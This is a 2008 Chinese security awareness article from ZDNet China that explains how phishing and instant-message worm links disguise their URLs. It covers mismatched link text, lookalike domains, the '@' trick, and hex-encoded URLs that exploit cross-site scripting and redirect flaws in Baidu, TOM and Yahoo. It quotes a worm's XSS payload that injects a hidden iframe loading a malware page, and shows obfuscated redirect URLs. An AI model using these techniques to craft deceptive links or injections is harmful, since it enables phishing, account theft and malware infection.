科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道骗子网站域名伪装手法大暴光

骗子网站域名伪装手法大暴光

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

现在QQ尾巴,MSNBOT等病毒已经为大家所熟悉,经常收到一些好友发来的莫名其妙的信息,这些信息是一些比较陌生的域名或者是明显伪装的域名,用户都会察觉而导致欺骗失败。

作者:zdnet安全频道 来源:论坛整理 2008年6月3日

关键字: 骗子网站 域名伪装

  • 评论
  • 分享微博
  • 分享邮件
现在QQ尾巴,MSNBOT等病毒已经为大家所熟悉,经常收到一些好友发来的莫名其妙的信息也见怪不怪了,越来越少的人会上那种说“我朋友缺钱现在你先帮我汇款”和“时间过得好快啊,马上过年了, 现在过年没点意思,还是怀念小时候……对了,我上次好象给你点了曲歌你没听是吗?要不我给你留的言你也没反应。我又点了一首歌给你,你用手机打:l2XX加06203458 就 可以听了,后面还有我的留言录音。 ^_^!记得去听啊~过年的时候短信有时候发不出去,现在顺便给你拜个早年吧~”之类的当。所以那些IM蠕虫病毒也把枪口转向了病毒传播和钓鱼网站这一方面来。

    一般常见的社会工程学欺骗有:“腾X公司成立八周年之际,举行回馈活动,详情请登陆XXXX.com”,“我的老婆自拍了很多照片,你看看哪张比较漂亮,XXXXX.photo.com”,“听说同事小刘建立色情网站被抓了,新闻在这里呢,YYYYY.NEW.COM”。

    这些信息也是带有很明显的欺骗性和诱惑性,不少IM用户只要一不注意就会去点击进入。一般这些地址连接的网站都是一些传播病毒的网站或者是钓鱼网站,还有一种是为了刷流量而做的网站。

    不过大部分用户还是具有一定的知识和警惕的,一些比较陌生的域名或者是明显伪装的域名,用户都会察觉而导致欺骗失败。黑客而为了提高其可信度,就对其域名地址进行伪装。下面我们来讲解一下常见的域名伪装手段:
注:以下文章将域名称为URL。

1. 超级连接欺骗法。
此方法一般存在于网站,BBS,BLOG等WEB站点,在IM软件方面就没有用处了。
型如:

    图中是对超级连接进行编辑的过程。文本框上写的是www.baidu.com,而实际上超级连接指向的地址却是http://www.qq.com。这个惯性思维误导在一定程度上也会欺骗了不少粗心的用户。其实我们要发现它,只需要对准超级连接时查看浏览器底部的提示,右键点击连接,选择属性来查看URL地址。

图2为查看属性,图3为浏览器底部信息。

2. 相似字符伪装法
此方法应用广泛,IM,WEB站点等都可以应用。

    一般的URL的后缀有.cn/.com/.com.cn/.net/.net.cn/.org/.org.cn等等,黑客就是利用了这些差别进行误导。黑客可以通过注册一个类似的域名来进行欺骗。

    型如:
    腾讯网站的URL是QQ.com,那么黑客就可以通过注册一个类似的域名:QQ.cn,QQ.com.cn,qq.org.cn等等。假如没有仔细辨认的话很容易就会被误导,而且一般这类URL指向的都是伪腾讯网站程序的站点,不仔细辨认还真的会被欺骗,假如站点上是说在办活动,需要你输入QQ的号码和密码,广大用户一不小心就会被黑客盗取帐号。
还有一些更加难以辨认的,型如:www.163.com和www.l63.com(当中是小写字母L),数字1和字母l,字母O和数字0,多一个s,少一个s,加入-或者_这两个符号,重复或者少字母,把两个字母换位置等。

3. URL字符HEX转换法
经常会看到这样的QQ尾巴:“看了吗,的视频新闻,刘若英全裸演出,勇露三点!!!http://search.tom.com/s.php?w=%3C%2Ftitle%3E%22%3Ciframe+src%3D%27http%3A%2F%2F%77%65%62%2e%79%75%6c%65%74%74%2e%63%6e%2f%63%2e%68%74%6d%27+width%3D0+height%3D0%3E%3C%2Fiframe%3E+&edt=07k”这个QQ尾巴比较特殊,利用了TOM搜索的过滤漏洞{此漏洞昨晚被补上了。不好意思。无法让各位实践。}那个URL的字符进行了HEX转换。其实那个漏洞是利用TOM搜索的过程中没有对一些HTML命令进行过滤而导致跨站,它这里搜索的字符是
",其中的
http://web.yulett.c**/***.htm就是病毒网页。只要你打开了那个TOM搜索连接,也就同时打开了这个网页。(因安全缘故隐去部分地址)
以前很多大网站甚至银行都存在此类跨站漏洞,现在基本都修补完毕了。百度还有百度知道等地方也曾被利用跨站。不过最近发现百度的MP3搜索频道还是存在跨站漏洞,还未修复,本人也发现并截获了利用此漏洞的QQ尾巴蠕虫病毒,已经通知了百度的工作人员。漏洞大概会在短期内修复。型如:http://mp3.baidu.com/tring?url= http://hi.baidu.com/greysign
这个漏洞主要是打开以后会执行tring?url=后面的任意URL而导致的跨站。假如我们结合一下HEX转换,把后面部分字符转换成HEX代码。就更加隐蔽,具有迷惑性。

修改后的代码:
http://mp3.baidu.com/tring?url=%68%74%74%70%3a%2f%2f%68%69%2e%62%61%69%64%75%2e%63%6f%6d%2f%67%72%65%79%73%69%67%6e
和上面未转换的代码具有同样的效果。

4. 万能的@大法
这方法在IE7已经无效,在火狐浏览器,Opera浏览器会遭遇提示。

其他的浏览器还是默默地做了黑客的从犯。包括我们最常用到的IE6。

代码型如:http://www.baidu.com@www.qq.com
假如你在浏览器输入以上地址。你会发现打开的网站是qq.com而不是百度。相信你已经看出来了吧。域名在被浏览器解析的时候,只执行了@后面的URL,并且没有任何提示,这也就给了黑客的可趁之机,不明所以的用户又遭殃了。而且很多人即使被欺骗以后还是没有发觉出来……这也是小G将这些域名伪装手法大暴光的原因之一。
同样,我们将那个URL中@ 后面的字符进行了HEX转换来加强伪装效果。
修改后代码为:http://www.baidu.com@%77%77%77%2e%71%71%2e%63%6f%6d
不影响执行。

    所以各位网友以后看到URL带@的话还要记得擦亮眼睛多看清楚地址。注:HEX是指将字符的ASCII编码进行16进制转换。例如字母a的10进制ASCII编码是97,HEX之后就是%61了。

    这些伪装手段,有的利用了著名站点的跨站漏洞,有的利用.了字符的相似,用户的粗心,也有的是利用一些简单的技术手段来实现伪装。总而言之,没有绝对的安全,我们只能通过不断学习知识来保护自己的爱机了,相信你看完本文会掌握一些关于网络欺骗,钓鱼和域名伪装的相关知识。

    截止至今日,百度的图片搜索跨站漏洞,百度知道跨站漏洞,MP3频道跨站漏洞已经全部修补完毕了,虽然我已经上报了好几个月,不过毕竟已经修复好了。最近流行的跨站漏洞是雅虎的:http://cn.wrs.yahoo.com/*http://www.google.com/

    • 评论
    • 分享微博
    • 分享邮件
        邮件订阅

        如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

        重磅专题
        往期文章
        最新文章